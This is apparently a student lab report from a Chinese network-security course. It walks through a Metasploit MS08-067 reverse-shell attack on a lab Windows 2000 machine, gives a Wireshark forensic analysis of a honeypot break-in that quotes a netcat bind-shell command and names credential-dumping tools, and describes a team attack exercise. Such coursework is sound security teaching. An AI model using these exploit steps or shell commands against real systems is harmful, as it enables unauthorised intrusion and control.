20231905 2023-2024-2 《网络攻防实践》实践六报告

最新推荐文章于 2024-05-30 22:28:49 发布

20231905谭舜聪

最新推荐文章于 2024-05-30 22:28:49 发布

阅读量702

点赞数 16

文章标签：网络安全

本文链接：https://blog.csdn.net/weixin_47501353/article/details/138122499

版权

20231905 2023-2024-2 《网络攻防实践》实践六报告

1.实践内容

（1）动手实践Metasploit windows attacker

任务：使用metasploit软件进行windows远程渗透统计实验

具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权

（2）取证分析实践：解码一次成功的NT系统破解攻击。

来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么
（3）团队对抗实践：windows系统远程渗透攻击和分析。

攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）

防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。

2.实践过程

2.1 动手实践Metasploit windows attacker

在kali打开metasploit，输入msfconsole,回车后就会进入到他的控制台界面
请添加图片描述
然后先搜索一下ms08_067漏洞，搜索结果如下图。这是针对这个漏洞的渗透攻击模块。

输入命令use exploit/windows/smb/ms08_067_netapi，使用MS08-067漏洞作为我们攻击的目标

输入命令 show payloads，显示所有可攻击载荷
请添加图片描述
输入show options展示渗透攻击需要设置的参数

输入set payload generic/shell_reverse_tcp设置攻击的载荷为tcp的反向连接

输入命令 set LHOST 192.168.200.4，设置渗透攻击的主机为Kali；
输入命令 set RHOST 192.168.200.124，设置渗透攻击的主机为Win2k
请添加图片描述
输入exploit开始渗透攻击

在Kali上使用命令ipconfig ，可以查询到靶机的IP，攻击成功

2.2 取证分析实践：解码一次成功的NT系统破解攻击

wireshark打开下载好的snort-0204@0117.log文件
请添加图片描述
按条件筛选ip.addr == 213.116.251.162 && ip.addr == 172.16.1.106进行浏览

跟踪数据包的数据流，发现117行数据包异常，该数据包有boot.ini启动，以及Unicode编码“%C0%AF”

在140行可以看到攻击者试图向服务器获取一个msadcs.dll文件
请添加图片描述
对149行追踪tcp流，可以看到字符串"ADM!ROX!YOUR!WORLD"，查询TCP流中发现查询语句中“dbq=c:\winnt\help\iis\htm\tutorial\btcustmr.mdb”，经查询知，这次攻击是由rain forest puppy编写的msadc(2).pl渗透代码发起的

请添加图片描述

请添加图片描述
筛选ftp连接，可以看出攻击者通过建立ftpcom脚本，并用FTP连接了samdump.dll、pdump.exe、nc.exe。

在下载完文件之后，发现攻击者执行了命令：cmd1.exe /c nc -l -p 6969 -e cmd1.exe。表示攻击者连接了6969端口，并且获得了访问权限
请添加图片描述
用tcp.port == 6969筛选一下，然后追踪一下TCP流来发现攻击者的行为，发现攻击者执行了一系列ls cd dir del指令，查看靶机的文件配置，删除了部分文件

追踪TCP流可以看到有rfp.txt 文件，可以得知攻击者认为这是台蜜罐主机
请添加图片描述

2.3 团队对抗实践：windows系统远程渗透攻击和分析

攻击机IP：192.168.31.148（20231905 kali）
靶机IP：192.168.31.24（20231911 win2k）
请添加图片描述

请添加图片描述

在kali中打开msfconsole
请添加图片描述
使用ms08-067这个漏洞攻击同学虚拟机上的win2k，设置目标IP

在对方靶机里新建一个文件夹，并在文件夹下新建txt，输入目标内容

靶机可以在文件里找到这个文件夹，以及txt内容

在wireshark中发现执行命令的痕迹
请添加图片描述

3.学习中遇到的问题及解决

问题1：在小组攻击中无法相互连通
问题1解决方案：把攻击虚拟机和靶机虚拟机都设置为桥接模式，并把真机同时连接在同一局域网下，靶机IP设置为自动分配

4.实践总结

通过本次实验，进行了Windows操作系统安全攻防实践，动手实践Metasploit windows attacker，对解码一次成功的NT系统破解攻击进行了取证分析实践，最后进行了团队对抗实践，对windows系统远程渗透攻击和分析。通过进行实操，加深了自己对于windows系统安全的理解，提高了自己的动手能力。